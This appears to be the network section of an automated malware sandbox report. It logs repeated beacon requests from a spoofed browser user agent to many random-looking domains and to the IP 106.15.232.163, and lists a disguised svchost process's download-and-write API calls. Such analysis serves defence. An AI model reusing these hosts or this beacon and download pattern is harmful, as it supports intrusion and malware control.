Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_134827.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731344868.1489616
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731344868.1504633
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0408-095b-a6b9-e37a1a5effa6 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731344868.1489616; parking_session=07951af7-1a60-440f-a856-c66b7de487f9
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731344868.1504633
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=d26b1bc4b9544e9356db55f438dfb4a0|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=dfd3f50e4dee78c8f9b2b106904110df|66.23.206.109|1731344858|1731344858|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344906|1731344858|24|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=910vr4788904590031611
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02654AB0 memset,GetProcessHeap,HeapAlloc,memset,memcpy,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,RtlFreeHeap,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02654AB0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
